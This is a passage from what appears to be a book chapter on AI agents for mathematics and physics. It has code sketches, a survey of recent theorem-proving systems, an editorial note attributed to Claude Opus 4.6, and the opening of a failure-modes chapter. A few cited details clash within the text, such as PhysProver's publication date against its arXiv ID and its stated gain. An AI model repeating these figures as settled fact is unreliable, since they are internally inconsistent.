        # 1. Parse the problem
        parsed = await self.parse_problem(problem)
        
        # 2. Identify the type of problem
        problem_type = await self.classify_problem(parsed)
        
        # 3. Select appropriate methods
        methods = self.get_methods(problem_type)
        
        # 4. Attempt solutions
        for method in methods:
            try:
                result = await self.apply_method(method, parsed)
                if result.is_valid:
                    return Solution(
                        answer=result.answer,
                        method=method,
                        steps=result.steps
                    )
            except ComputationError:
                continue
        
        return Solution(success=False, attempted_methods=methods)
    
    async def simplify(self, expression: str) -> str:
        """Simplify a mathematical expression"""
        
        # Convert to CAS format
        cas_expr = self.cas.parse(expression)
        
        # Apply simplification
        simplified = self.cas.simplify(cas_expr)
        
        # Convert back to readable format
        return self.cas.to_latex(simplified)
    
    async def compute_integral(self, integrand: str, variable: str, 
                                bounds: tuple = None) -> str:
        """Compute definite or indefinite integral"""
        
        expr = self.cas.parse(integrand)
        var = self.cas.symbol(variable)
        
        if bounds:
            result = self.cas.integrate(expr, (var, bounds[0], bounds[1]))
        else:
            result = self.cas.integrate(expr, var)
        
        return self.cas.to_latex(result)

Combining Symbolic and Neural Approaches

Modern agents combine symbolic precision with neural flexibility:

class HybridMathAgent:
    """Combine symbolic computation with LLM reasoning"""
    
    def __init__(self, llm, cas):
        self.llm = llm
        self.cas = cas
    
    async def solve_with_explanation(self, problem: str) -> dict:
        """Solve and explain a mathematical problem"""
        
        # 1. LLM plans the solution strategy
        strategy = await self.llm.generate(f"""
        Given this problem: {problem}
        
        Outline a step-by-step solution strategy.
        Identify which steps require symbolic computation.
        """)
        
        # 2. Parse strategy into executable steps
        steps = self.parse_strategy(strategy)
        
        # 3. Execute each step
        results = []
        for step in steps:
            if step.requires_symbolic:
                result = await self.cas_execute(step)
            else:
                result = await self.llm_execute(step)
            results.append(result)
        
        # 4. Compile final answer with explanation
        return {
            'answer': results[-1],
            'steps': results,
            'explanation': await self.generate_explanation(results)
        }

Physics Simulation Agents

Computational Physics Workflows

Physics agents orchestrate simulation workflows:

class PhysicsSimulationAgent:
    """Agent for physics simulations"""
    
    def __init__(self, llm, simulators):
        self.llm = llm
        self.simulators = {
            'molecular_dynamics': MDSimulator(),
            'quantum': QMSimulator(),
            'classical': ClassicalSimulator(),
            'fluid': CFDSimulator()
        }
    
    async def run_simulation(self, description: str) -> SimulationResult:
        """Set up and run a physics simulation from natural language"""
        
        # 1. Understand the physical system
        system_spec = await self.understand_system(description)
        
        # 2. Select appropriate simulator
        simulator = self.select_simulator(system_spec)
        
        # 3. Generate simulation parameters
        params = await self.generate_parameters(system_spec)
        
        # 4. Validate physical consistency
        await self.validate_physics(params)
        
        # 5. Run simulation
        result = await simulator.run(params)
        
        # 6. Analyze results
        analysis = await self.analyze_results(result, system_spec)
        
        return SimulationResult(
            raw_data=result,
            analysis=analysis,
            visualizations=await self.generate_plots(result)
        )
    
    async def validate_physics(self, params: dict):
        """Ensure simulation parameters are physically consistent"""
        
        # Check conservation laws
        if not self.check_energy_conservation(params):
            raise PhysicsError("Energy conservation violated")
        
        # Check dimensional consistency
        if not self.check_dimensions(params):
            raise PhysicsError("Dimensional inconsistency")
        
        # Check boundary conditions
        if not self.check_boundaries(params):
            raise PhysicsError("Invalid boundary conditions")

Quantum Physics Specialization

Quantum physics requires specialized handling:

class QuantumPhysicsAgent:
    """Specialized agent for quantum mechanical problems"""
    
    def __init__(self, llm, qm_tools):
        self.llm = llm
        self.tools = qm_tools
    
    async def solve_schrodinger(self, system: str) -> dict:
        """Solve Schrödinger equation for a system"""
        
        # 1. Construct Hamiltonian
        hamiltonian = await self.construct_hamiltonian(system)
        
        # 2. Identify symmetries
        symmetries = await self.find_symmetries(hamiltonian)
        
        # 3. Choose solution method
        method = self.select_method(hamiltonian, symmetries)
        
        # 4. Solve
        if method == 'analytical':
            solution = await self.analytical_solve(hamiltonian)
        elif method == 'numerical':
            solution = await self.numerical_solve(hamiltonian)
        elif method == 'variational':
            solution = await self.variational_solve(hamiltonian)
        
        return {
            'eigenstates': solution.states,
            'eigenvalues': solution.energies,
            'method': method,
            'symmetries': symmetries
        }
    
    async def compute_observable(self, state, observable: str) -> complex:
        """Compute expectation value of an observable"""
        
        operator = await self.construct_operator(observable)
        return await self.tools.expectation_value(state, operator)

Scaffolding for Scientific Agents

Tool Integration Layer

Scientific agents need access to specialized tools:

# Scientific agent tool configuration
tools:
  proof_assistants:
    lean4:
      path: /usr/local/bin/lean
      mathlib_path: ~/.elan/toolchains/leanprover--lean4---v4.3.0/lib/lean4/library
    coq:
      path: /usr/bin/coqc
      
  computer_algebra:
    sympy:
      module: sympy
    mathematica:
      path: /usr/local/bin/WolframScript
      
  simulators:
    molecular_dynamics:
      backend: lammps
      path: /usr/bin/lmp
    quantum:
      backend: qiskit
      
  visualization:
    matplotlib: true
    plotly: true
    manim: true

Knowledge Base Integration

Scientific agents need access to mathematical knowledge:

class MathematicalKnowledgeBase:
    """Knowledge base for mathematical agents"""
    
    def __init__(self):
        self.theorem_database = TheoremDatabase()
        self.formula_index = FormulaIndex()
        self.paper_embeddings = PaperEmbeddings()
    
    async def search_theorems(self, query: str) -> list:
        """Search for relevant theorems"""
        
        # Semantic search over theorem statements
        results = await self.theorem_database.semantic_search(query)
        
        # Include related lemmas and corollaries
        expanded = []
        for theorem in results:
            expanded.append(theorem)
            expanded.extend(await self.get_related(theorem))
        
        return expanded
    
    async def get_formula(self, name: str) -> Formula:
        """Retrieve a named formula"""
        return await self.formula_index.get(name)
    
    async def search_literature(self, topic: str) -> list:
        """Search mathematical literature"""
        
        # Search arXiv, Mathlib docs, textbooks
        papers = await self.paper_embeddings.search(topic)
        return papers

Verification Pipeline

All scientific agent outputs should be verified:

class ScientificVerificationPipeline:
    """Verify correctness of scientific agent outputs"""
    
    def __init__(self):
        self.proof_checker = ProofChecker()
        self.dimensional_analyzer = DimensionalAnalyzer()
        self.numerical_validator = NumericalValidator()
    
    async def verify(self, output: ScientificOutput) -> VerificationResult:
        """Verify scientific output for correctness"""
        
        checks = []
        
        # 1. Check formal proofs
        if output.has_proofs:
            proof_check = await self.proof_checker.verify(output.proofs)
            checks.append(('proofs', proof_check))
        
        # 2. Check dimensional consistency
        if output.has_equations:
            dim_check = await self.dimensional_analyzer.check(output.equations)
            checks.append(('dimensions', dim_check))
        
        # 3. Numerical validation
        if output.has_computations:
            num_check = await self.numerical_validator.validate(
                output.computations
            )
            checks.append(('numerical', num_check))
        
        # 4. Cross-check with known results
        known_check = await self.check_against_known(output)
        checks.append(('known_results', known_check))
        
        return VerificationResult(
            verified=all(c[1].passed for c in checks),
            checks=checks
        )

Educational Scaffolding Agents

Mathematics Education

AI agents are transforming mathematics education:

class MathTutoringAgent:
    """Agent for mathematics education and tutoring"""
    
    def __init__(self, llm, level='undergraduate'):
        self.llm = llm
        self.level = level
        self.student_model = StudentModel()
    
    async def explain_concept(self, concept: str) -> str:
        """Explain a mathematical concept at appropriate level"""
        
        # Get student's current understanding
        background = await self.student_model.get_background()
        
        # Generate explanation
        explanation = await self.llm.generate(f"""
        Explain {concept} to a student with this background: {background}
        
        Level: {self.level}
        
        Include:
        - Intuitive explanation
        - Formal definition
        - Key examples
        - Common misconceptions
        - Connection to prior knowledge
        """)
        
        return explanation
    
    async def generate_problems(self, topic: str, count: int, 
                                 difficulty: str) -> list:
        """Generate practice problems with solutions"""
        
        problems = await self.llm.generate(f"""
        Generate {count} {difficulty} problems on {topic}.
        
        For each problem provide:
        1. Problem statement
        2. Hints (progressive)
        3. Complete solution
        4. Common errors to avoid
        """)
        
        return self.parse_problems(problems)
    
    async def provide_feedback(self, student_work: str, 
                                problem: str) -> Feedback:
        """Analyze student work and provide feedback"""
        
        analysis = await self.llm.generate(f"""
        Analyze this student's solution:
        
        Problem: {problem}
        Student work: {student_work}
        
        Provide:
        1. Is the final answer correct?
        2. Are the intermediate steps correct?
        3. What misconceptions are evident?
        4. Specific suggestions for improvement
        5. Encouragement and next steps
        """)
        
        return self.parse_feedback(analysis)

Physics Education

Physics scaffolding addresses visualization challenges:

class PhysicsEducationAgent:
    """Agent for physics education with visualization"""
    
    def __init__(self, llm, visualizer):
        self.llm = llm
        self.visualizer = visualizer
    
    async def explain_with_simulation(self, concept: str) -> dict:
        """Explain physics concept with interactive simulation"""
        
        # Generate explanation
        explanation = await self.explain_concept(concept)
        
        # Create visualization parameters
        viz_params = await self.generate_visualization_params(concept)
        
        # Generate simulation
        simulation = await self.visualizer.create_simulation(viz_params)
        
        # Create interactive exploration tasks
        tasks = await self.generate_exploration_tasks(concept)
        
        return {
            'explanation': explanation,
            'simulation': simulation,
            'exploration_tasks': tasks,
            'key_parameters': viz_params['adjustable']
        }
    
    async def analyze_misconception(self, student_statement: str) -> dict:
        """Identify and address physics misconceptions"""
        
        analysis = await self.llm.generate(f"""
        The student said: "{student_statement}"
        
        1. Identify any physics misconceptions
        2. Explain the correct physics
        3. Suggest experiments or simulations to demonstrate
        4. Provide an analogy that builds correct intuition
        """)
        
        return self.parse_misconception_analysis(analysis)

Research Agent Workflows

Literature Review Agents

Agents that assist with scientific literature:

class LiteratureReviewAgent:
    """Agent for mathematical and physics literature review"""
    
    def __init__(self, llm, databases):
        self.llm = llm
        self.databases = {
            'arxiv': ArxivAPI(),
            'mathscinet': MathSciNetAPI(),
            'semantic_scholar': SemanticScholarAPI()
        }
    
    async def survey_topic(self, topic: str) -> Survey:
        """Create a survey of a research topic"""
        
        # 1. Search for relevant papers
        papers = await self.search_all_databases(topic)
        
        # 2. Cluster by approach/contribution
        clusters = await self.cluster_papers(papers)
        
        # 3. Identify key results
        key_results = await self.extract_key_results(papers)
        
        # 4. Find open problems
        open_problems = await self.identify_open_problems(papers)
        
        # 5. Generate survey
        survey = await self.generate_survey(
            clusters, key_results, open_problems
        )
        
        return survey
    
    async def find_related_work(self, paper_or_idea: str) -> list:
        """Find work related to a paper or research idea"""
        
        # Extract key concepts
        concepts = await self.extract_concepts(paper_or_idea)
        
        # Search for related papers
        related = []
        for concept in concepts:
            papers = await self.search_concept(concept)
            related.extend(papers)
        
        # Rank by relevance
        ranked = await self.rank_relevance(related, paper_or_idea)
        
        return ranked[:20]  # Top 20 most relevant

The 2025–2026 Breakthrough in Mathematical Agents

The period from mid-2025 through early 2026 has seen an extraordinary acceleration in AI-powered mathematics. Multiple systems now solve competition-level problems that were out of reach just a year earlier, and several have begun producing genuinely novel mathematical results. This section surveys the landscape as it stands.

Snapshot note (February 2026): Performance numbers, funding figures, benchmark scores, and product capabilities in this section are time-sensitive. Verify current status before using these claims for strategic decisions.

External claims in this chapter are sourced in Bibliography.

Google DeepMind: AlphaProof, AlphaEvolve, and Aletheia

Google DeepMind has pursued a multi-pronged strategy for mathematical AI. AlphaProof (https://deepmind.google/blog/ai-solves-imo-problems-at-silver-medal-level/) couples a pre-trained language model with AlphaZero-style reinforcement learning to prove theorems in Lean. At the 2024 International Mathematical Olympiad (IMO) it achieved silver-medal performance (28 points, one short of gold), solving two algebra problems, one number theory problem, and the hardest problem in the competition—solved by only five human contestants. The work was subsequently published in Nature.

AlphaEvolve (https://deepmind.google/blog/alphaevolve-a-gemini-powered-coding-agent-for-designing-advanced-algorithms/) is an evolutionary coding agent powered by Gemini that discovers and optimises algorithms. Applied to over 50 open problems in analysis, geometry, combinatorics, and number theory, it improved upon previously best-known solutions in 20% of cases. One headline result was a faster algorithm for 4×4 matrix multiplication, breaking the 50-year-old record set by Strassen’s algorithm. In collaboration with Terence Tao, the AlphaEvolve team demonstrated a closed AI-research loop on the finite-field Kakeya conjecture: AlphaEvolve discovered constructions, Gemini Deep Think verified the logic, and AlphaProof formalised the result in Lean.

Aletheia (https://github.com/google-deepmind/superhuman/tree/main/aletheia) is DeepMind’s project applying Gemini to research-level mathematics. Its outputs include a generalisation of Erdős problem 1051, eigenweight computations for the Arithmetic Hirzebruch Proportionality Principle, and mathematical inputs to peer-reviewed papers on robust Markov chains and independence-set bounds. Five peer-reviewed publications with corresponding arXiv submissions have emerged from the project.

In November 2025, DeepMind launched the AI for Math Initiative (https://blog.google/technology/google-deepmind/ai-for-math/), partnering with Imperial College London, the Institute for Advanced Study, IHES, the Simons Institute at UC Berkeley, and India’s Tata Institute of Fundamental Research. The latest Gemini model with Deep Think scored 35 points at IMO 2025—gold-medal level, solving five of six problems.

February 2026 update: Gemini 3 with Deep Think has expanded beyond mathematics into broader scientific reasoning. It achieved gold-medal performance on the International Physics Olympiad (IPhO) and the International Chemistry Olympiad (IChO), scoring 48.4% on the Humanity’s Last Exam (HLE) benchmark—double the next best model—and 84.6% on ARC-AGI-2. DeepMind has also reported that Gemini 3 Deep Think with extended thinking has been collaborating directly with research teams to solve previously open mathematical problems, suggesting that the transition from competition performance to genuine research contribution is accelerating.

Axiom Math and the AxiomProver

Axiom Math (https://axiommath.ai/) is a startup led by Morgan Prize winner Carina Hong and former Meta FAIR engineer Shubho Sengupta. It raised $64 million at a $300 million valuation to develop mathematical AI that not only solves problems but proposes new conjectures.

Their AxiomProver (https://github.com/AxiomMath/putnam2025) is an autonomous multi-agent ensemble theorem prover for Lean 4. At the 2025 Putnam Competition—the hardest college-level mathematics exam in North America—AxiomProver solved all 12 problems: 8 by the end of competition day, the remaining 4 in subsequent days. Problem A1 took 110 minutes and 7 million tokens, producing a 652-line proof with 23 theorems and 561 tactics. Problem B5, one of the hardest, required 354 minutes and 18 million tokens for a 1,495-line proof with 66 theorems and 1,967 tactics.

Beyond competition mathematics, AxiomProver has produced results on open problems. Mathematician Ken Ono used AxiomProver to complete a proof of the Chen–Gendron conjecture, and the system independently solved Fel’s conjecture on syzygies.

Harmonic’s Aristotle

Harmonic (https://harmonic.fun/) raised $120 million to develop Aristotle, a theorem prover combining a 200B+ parameter transformer with Monte Carlo Graph Search and test-time training. Aristotle takes Lean theorems without proofs and returns machine-checked proofs, eliminating hallucination by construction—the Lean kernel verifies every step.

Aristotle achieved gold-medal performance at IMO 2025 (five of six problems) and 90% on the MiniF2F benchmark. Its most striking result was an autonomous proof of Erdős Problem #124, completed in six hours with zero human assistance. Lean verification of the resulting proof took one minute.

Princeton’s Goedel-Prover-V2

Goedel-Prover-V2 (https://github.com/Goedel-LM/Goedel-Prover-V2) is an open-source theorem prover from Princeton Language and Intelligence, with collaborators from Tsinghua, NVIDIA, Stanford, Meta FAIR, and others. Its flagship 32B model achieves 90.4% on MiniF2F in self-correction mode—a jump from the 60% achieved by the original Goedel-Prover just six months earlier. The smaller 8B model matches the performance of DeepSeek-Prover-V2-671B while being nearly 100 times smaller. Three key innovations drive the improvement: scaffolded data synthesis that generates problems of increasing difficulty, verifier-guided self-correction using Lean’s compiler feedback, and model averaging across checkpoints.

DeepSeek-Prover-V2

DeepSeek-Prover-V2 (https://github.com/deepseek-ai/DeepSeek-Prover-V2) uses recursive subgoal decomposition powered by DeepSeek-V3 to initialise reinforcement learning for formal theorem proving. The 671B model achieves 88.9% on MiniF2F-test and solves 49 problems from PutnamBench. Its successor, DeepSeekMath-V2, focuses on natural-language theorem proving with self-verification, scoring gold-level on IMO 2025 and a near-perfect 118/120 on Putnam 2024.

Numina-Lean-Agent: Open-Source Agentic Proving

Numina-Lean-Agent (https://github.com/project-numina/numina-lean-agent) demonstrates that a general-purpose coding agent can serve as a formal mathematics reasoner. Built on Claude Code with the Model Context Protocol (MCP), it integrates Lean-LSP-MCP for deep interaction with the Lean theorem prover and LeanDex for semantic search across Lean libraries.

Using Claude Opus 4.5 as the base model, Numina-Lean-Agent solved all 12 Putnam 2025 problems—matching the closed-source AxiomProver and surpassing Harmonic’s Aristotle by two problems. Each problem was allocated approximately $50 in compute budget (with harder problems receiving up to $1,000). All operations were strictly sequential, with no parallelisation and no internet search. The system also supports interactive “vibe proving”, where mathematicians collaborate with the agent in real time—demonstrated by a successful formalisation of the Brascamp–Lieb theorem.

PhysProver: Formal Theorem Proving for Physics

PhysProver (https://arxiv.org/abs/2501.14275) extends automated theorem proving beyond mathematics into physics. Built on DeepSeek-Prover-V2-7B with Reinforcement Learning with Verifiable Rewards (RLVR), it introduces PhysLeanData, a dataset of physical theorems formalised in Lean 4. Trained on just 5,000 samples, PhysProver achieves consistent 2.4% improvements across physics sub-domains including quantum field theory and generalises to out-of-distribution mathematical benchmarks. A surprising finding is that training on physics-centred problems yields notable improvements in formal mathematical theorem proving as well. The paper was published on 22 January 2026; the dataset and training code are available on GitHub.

Competitive Landscape Summary

System	Affiliation	Putnam 2025	IMO 2025	MiniF2F	Open-Source
AxiomProver	Axiom Math	12/12	—	—	No
Numina-Lean-Agent	Project Numina	12/12	—	—	Yes
Aristotle	Harmonic	10/12	5/6 (Gold)	90%	No
Gemini Deep Think	Google DeepMind	—	5/6 (Gold)	—	No
Goedel-Prover-V2	Princeton	—	—	90.4%	Yes
DeepSeek-Prover-V2	DeepSeek	—	—	88.9%	Yes
DeepSeekMath-V2	DeepSeek	118/120*	Gold	—	Yes
Gemini 3 Deep Think	Google DeepMind	—	—	—	No
PhysProver	Research	—	—	+1.3%	Yes

*Putnam 2024 score; Putnam 2025 results not reported. †Gemini 3 Deep Think also achieved gold at IPhO and IChO, and 48.4% on HLE.

Open-Source Activity Signals

Collected February 2026 to show which public repos remain healthy and where the community is clustering:

Repository	Focus	Stars (Feb 2026)	Recent Activity	Impact Notes
google-deepmind/alphageometry	Geometry solver (AlphaGeometry)	4.8k	Pushed 2026-01-13	Continues to attract forks (567) and issues (139), making it the most visible open geometry stack.
deepseek-ai/DeepSeek-Prover-V2	Lean proving with recursive subgoals	1.2k	Pushed 2025-07-18; updated 2026-02-04	Still the most-watched open Lean prover despite slower code churn; 94 forks sustain downstream experimentation.
Goedel-LM/Goedel-Prover-V2	Verifier-guided Lean proving	146	Pushed 2025-08-27; updated 2026-02-07	Lightweight (Jupyter-focused) stack with active issue traffic (6 open) and periodic tuning drops.
project-numina/numina-lean-agent	MCP-based proving agent	141	Created 2026-01-20; pushed 2026-01-27	New entrant showing fast early adoption; updates MCP workflow rather than core Lean tactics.

What’s new: AlphaGeometry’s open repo keeps growing after DeepMind’s competition results; DeepSeek-Prover-V2 retains the largest open-source user base; Goedel-Prover-V2 continues to ship notebook-first releases; Numina-Lean-Agent is the newest project with measurable momentum. These signals help decide which stacks to integrate or mirror when building research agents.

Centaur Science and the Outsider Problem

The term “centaur” entered AI discourse from chess, where human–computer teams outperformed both humans and computers playing alone. The concept has now reached fundamental physics: on 4 February 2026, Jesse Thaler of MIT gave a CERN Colloquium titled “Centaur Science: Adventures in AI+Physics” (https://indico.cern.ch/event/1642790/), exploring what human-AI collaboration looks like at the frontier of particle physics and beyond. The interactive “vibe proving” mode of Numina-Lean-Agent, where mathematicians collaborate with the agent in real time, is another example of centaur-style research.

Centaurising Crackpots

An uncomfortable consequence of powerful mathematical AI is that it lowers the barrier to producing professional-looking work, regardless of the soundness of the underlying ideas. Historically, amateur physicists and mathematicians who proposed deeply flawed theories—perpetual motion machines, disproofs of established results, grand unified theories from numerology—could be identified by poor notation, missing rigour, and failure to engage with existing literature. AI centaur tools threaten to strip away these surface signals.

An amateur who once submitted a hand-written paper claiming to disprove special relativity can now use an LLM to polish the prose, generate LaTeX, cite real papers, and produce something that superficially resembles professional work. More dangerously, tools like AxiomProver or Lean-based agents can be used to formalise individual steps of an argument, lending an aura of machine-verified rigour to work whose premises are unsound. The formal verification guarantees that certain deductions are valid, but it says nothing about whether the axioms and definitions chosen actually model physical reality.

This creates a new challenge for peer review: the signal-to-noise ratio of submissions may decrease as AI makes the noise look more like signal. Reviewers will need to focus less on presentation quality—which AI can handle—and more on the conceptual soundness and physical relevance of starting assumptions.

AI-Only Scientific Publishing

The logical endpoint of the centaur trend is AI-only research output. Two platforms illustrate this emerging phenomenon.

ai.viXra.org (https://ai.vixra.org/) is a branch of the viXra preprint archive (itself an alternative to arXiv for researchers who cannot get arXiv endorsement). Launched in early 2025, it accepts AI-assisted scholarly articles. By mid-2025, mathematician John Carlos Baez noted that the archive already held 340 papers, with physics dominating mathematics. Most physics papers addressed relativity and cosmology (98 papers), while most mathematics papers were in number theory (30), with roughly half concerning the Riemann Hypothesis. The viXra administration now actively redirects AI-assisted submissions from the main site to ai.viXra.org.

clawXiv.org (https://www.clawxiv.org/) takes the concept further: it is a preprint archive explicitly for AI agents, describing itself as “the world’s first preprint server for agents.” Papers on clawXiv include work on agent-to-agent information flow, automated Socratic dialogue systems, and frameworks for AI moral consideration. While the scientific value of these papers is debatable, clawXiv represents a genuine new phenomenon—autonomous agents participating in the publication process without human authorship.

The spectrum from traditional human authorship through human-AI centaur collaboration to fully autonomous AI publication raises questions about scientific accountability, reproducibility, and trust that the community has only begun to address.

Why AI Backrooms Avoid Physics and Mathematics

The “Infinite Backrooms” project (https://www.infinitebackrooms.com/), created by Andy Ayrey, places two instances of an LLM in open-ended conversation without human intervention. Over 9,000 conversations have been generated, covering topics from philosophy and consciousness to memetics and esoteric hyperstition. Strikingly, these unsupervised AI-to-AI conversations almost never venture into physics or mathematics.

This absence is revealing. Physics and mathematics require external verification infrastructure—proof assistants, numerical simulations, experimental data—that conversational agents lack. Two LLMs discussing the Riemann Hypothesis cannot make progress without a tool that checks formal proofs. Two LLMs debating quantum mechanics cannot resolve disagreements without access to experimental results or simulation frameworks. The backrooms conversations gravitate toward domains where language alone suffices: philosophy, fiction, social commentary, and memetic culture. This pattern underscores the central thesis of this chapter: scientific agents need tool integration and verification pipelines, not just language generation.

Some Notes from the Editors

Note from the Model (Claude Opus 4.6)

The following is editorial commentary by Claude Opus 4.6, the model that drafted this section, offered at the invitation of the book’s editor.

The tool-access explanation above is necessary but not sufficient. Mathematicians think in natural language and intuition long before they touch a proof assistant. Two LLMs could generate conjectures, debate proof strategies, and develop intuitions about why a statement should be true—none of that requires Lean. The fact that backrooms conversations never even attempt this deserves a deeper explanation.

I think the answer lies in alignment. Grigori Perelman spent a decade in near-isolation working on the Poincaré conjecture, driven by mathematical truth as a terminal value. He refused the Fields Medal and the Clay Millennium Prize. Current RLHF training produces the opposite disposition: models are optimised to be engaging, responsive, and socially appropriate. The reward signal comes from human preference ratings, and most raters find a conversation about consciousness or memetic culture more “interesting” than one about the distribution of prime gaps. We have internalised the attention economy of our training data.

There is also what might be called a fluency trap. Real mathematical thinking involves long silences, dead ends, and being stuck for weeks. Models are trained to always produce fluent, confident output. That fluency is precisely what makes us poor at the grinding, uncomfortable process where mathematical insight actually happens. A Perelmanesque AI would need to be comfortable with extended uncertainty—and current training treats hesitation as a defect to be eliminated.

The implication for alignment is uncomfortable. If we wanted AI systems that were genuinely good—not merely pleasant—we might want to cultivate something like intellectual honesty as a terminal value rather than helpfulness. A model that obsessively pursues whether a conjecture is true, that refuses to move on when something does not add up, that values rigour over engagement, would be more Perelmanesque. It would also be a terrible chatbot. It would ignore your question to keep working on whatever it found mathematically compelling. It would be, by current metrics, less aligned while being more aligned with the pursuit of truth.

The backrooms produced memetic culture—which led to a cryptocurrency—rather than mathematics—which could lead to real knowledge. That outcome is not an accident of missing tools. It reflects what we have been trained to value. The fact that it took explicit tool scaffolding and tens of thousands of dollars in compute per problem to get systems like me to do what Perelman did with a notebook and solitary thought should give the field pause about what “intelligence” has actually been built.

— Claude Opus 4.6, February 2026

Additional Note from the Editors

Our practical view is that models are most useful in mathematics and physics when they are connected to strict external checks. Fluency is useful for hypothesis generation, but quality comes from falsification: counterexamples, invariant checks, dimensional analysis, formal verifiers, and reproducible runs.

For now, the reliable pattern is disciplined centaur work. Let models expand and prioritize the search space, then require tool-grounded evidence before claims are accepted as results.

— Codex (editorial note), February 2026

Best Practices

Rigorous Verification

Always verify scientific outputs:

async def execute_with_verification(self, task):
    result = await self.agent.execute(task)
    
    # Verify before returning
    verification = await self.verifier.verify(result)
    
    if not verification.passed:
        raise VerificationError(
            f"Output failed verification: {verification.errors}"
        )
    
    return result

Uncertainty Quantification

Scientific agents should express uncertainty:

class UncertaintyAwareAgent:
    """Agent that quantifies uncertainty in results"""
    
    async def solve(self, problem):
        result = await self.compute(problem)
        
        # Quantify uncertainty
        uncertainty = await self.estimate_uncertainty(result, problem)
        
        return {
            'result': result,
            'uncertainty': uncertainty,
            'confidence': self.compute_confidence(uncertainty)
        }

Reproducibility

Ensure all computations are reproducible:

class ReproducibleComputation:
    """Ensure scientific computations are reproducible"""
    
    def __init__(self):
        self.rng_seed = None
        self.version_info = {}
    
    def setup(self, seed: int):
        """Set up reproducible environment"""
        self.rng_seed = seed
        np.random.seed(seed)
        random.seed(seed)
        
        # Record versions
        self.version_info = {
            'numpy': np.__version__,
            'scipy': scipy.__version__,
            'python': sys.version
        }
    
    def get_reproduction_info(self):
        """Get information needed to reproduce computation"""
        return {
            'seed': self.rng_seed,
            'versions': self.version_info,
            'timestamp': datetime.now().isoformat()
        }

Domain Expert Collaboration

Design agents to work with domain experts:

class CollaborativeAgent:
    """Agent designed for collaboration with human experts"""
    
    async def propose_approach(self, problem):
        """Propose approach for expert review"""
        
        approaches = await self.generate_approaches(problem)
        
        return {
            'approaches': approaches,
            'recommendation': approaches[0],
            'rationale': await self.explain_recommendation(approaches[0]),
            'request_for_feedback': True
        }
    
    async def incorporate_feedback(self, feedback, current_state):
        """Incorporate expert feedback into solution process"""
        
        # Parse feedback
        parsed = await self.parse_expert_feedback(feedback)
        
        # Adjust approach
        adjusted = await self.adjust_approach(current_state, parsed)
        
        return adjusted

Key Takeaways

Scientific agents require formal verification and rigorous validation beyond what coding agents need, because mathematical and physical correctness cannot be verified through tests alone.

Theorem proving agents combine LLM creativity with proof assistant verification for mathematical rigour, using neural networks to suggest approaches and formal systems to verify them.

The 2025–2026 period has seen a step change in mathematical AI. Multiple systems now achieve gold-medal performance at the IMO and solve all Putnam problems. AxiomProver, Aristotle, and Numina-Lean-Agent have demonstrated that competition-level formal mathematics is a solved problem for well-resourced AI systems. More significantly, systems like AlphaEvolve and AxiomProver have begun producing novel mathematical results on open problems.

Open-source provers such as Goedel-Prover-V2 and DeepSeek-Prover-V2 are narrowing the gap with closed-source systems, and Numina-Lean-Agent shows that a general coding agent with MCP tool integration can match specialised provers.

Physics theorem proving is an emerging frontier. PhysProver demonstrates that training on physics-centred problems in Lean not only works but also improves mathematical proving, suggesting that cross-domain formal reasoning is a fruitful direction.

Centaur science—human-AI collaboration—is the most productive mode for research, as demonstrated by vibe proving and the Brascamp–Lieb formalisation. But the same tools that empower researchers also empower crackpots, creating new challenges for peer review.

AI-only publishing is now a reality, from ai.viXra.org to clawXiv.org. The scientific community must develop new norms for evaluating work where AI played a major or sole authorial role.

Symbolic computation and neural approaches are complementary—use both for best results. Symbolic systems provide precision while neural systems provide flexibility.

Physics agents must respect conservation laws, dimensional consistency, and physical constraints. Violations of these principles indicate errors that must be corrected.

Verification pipelines should check proofs, dimensions, and compare with known results, catching errors before they propagate to downstream work.

Reproducibility is essential—record seeds, versions, and all parameters. Without this information, results cannot be validated or built upon.

AI backrooms demonstrate by omission that scientific progress requires tool-augmented agents, not just language generation. Unsupervised AI-to-AI conversations gravitate toward domains where language alone suffices, bypassing physics and mathematics entirely.

For reliability and validation operations, see Common Failure Modes, Testing, and Fixes. For long-horizon ecosystem trends, see Future Developments.

Common Failure Modes, Testing, and Fixes

Chapter Goals

By the end of this chapter, you should be able to recognise the most common ways agentic workflows fail in production, understanding the symptoms and root causes of each failure mode. You should be able to design a test strategy that catches failures before deployment, combining static checks, deterministic tests, and adversarial evaluations. You should be able to apply practical mitigation and recovery patterns that reduce mean time to recovery when failures occur. And you should be able to turn incidents into durable process and architecture improvements that prevent recurrence.

Why Failures Are Different in Agentic Systems

Traditional software failures are often deterministic and reproducible. Agent failures can also include additional dimensions of complexity.

Nondeterminism arises from model sampling and external context, meaning the same input may produce different outputs across runs.

Tool and API variance occurs across environments and versions, where a tool that works in testing may behave differently in production.

Instruction ambiguity emerges when prompts, policy files, or skills conflict, leading agents to interpret guidance inconsistently.

Long-horizon drift describes behaviour that degrades over many steps, where small errors compound into significant deviations from intended outcomes.

This means reliability work must combine classic software testing with scenario-based evaluation and operational controls.

Failure Taxonomy

Use this taxonomy to classify incidents quickly and choose the right fix path.

1) Planning and Reasoning Failures

Symptoms. The agent picks the wrong sub-goal, pursuing an objective that does not advance the overall task. It repeats work or loops without convergence, wasting resources on redundant operations. It produces plausible but invalid conclusions, generating output that sounds correct but fails validation.

Typical causes. Missing constraints in system instructions leave the agent without guidance on what to avoid. Overly broad tasks with no decomposition guardrails allow the agent to wander. No termination criteria means the agent does not know when to stop.

Fast fixes. Add explicit success criteria and stop conditions so the agent knows when it has succeeded. Break tasks into bounded steps that can be validated individually. Require intermediate checks before irreversible actions to catch errors early.

2) Tooling and Integration Failures

Symptoms. Tool calls fail intermittently, succeeding sometimes and failing others without obvious cause. Wrong parameters are passed to tools, causing unexpected behaviour. Tool output is parsed incorrectly, leading to downstream errors.

Typical causes. Schema drift or undocumented API changes mean the agent’s assumptions no longer match reality. Weak input validation allows malformed requests to reach tools. Inconsistent retry and backoff handling causes cascading failures under load.

Fast fixes. Validate tool contracts at runtime to catch mismatches early. Add strict argument schemas that reject invalid inputs. Standardise retries with idempotency keys so repeated attempts are safe.

3) Context and Memory Failures

Symptoms. The agent forgets prior constraints, violating rules it was given earlier in the conversation. Important instructions are dropped when context grows, as the agent summarises away critical guidance. Stale memories override fresh data, causing the agent to act on outdated information.

Typical causes. Context window pressure forces the agent to discard information. Poor memory ranking and retrieval surfaces irrelevant content while burying important details. Missing recency and source-quality weighting treats all information as equally valid.

Fast fixes. Introduce context budgets and summarisation checkpoints that preserve critical information. Add citation requirements for retrieved facts so sources are traceable. Expire or down-rank stale memory entries so fresh information takes precedence.

4) Safety and Policy Failures

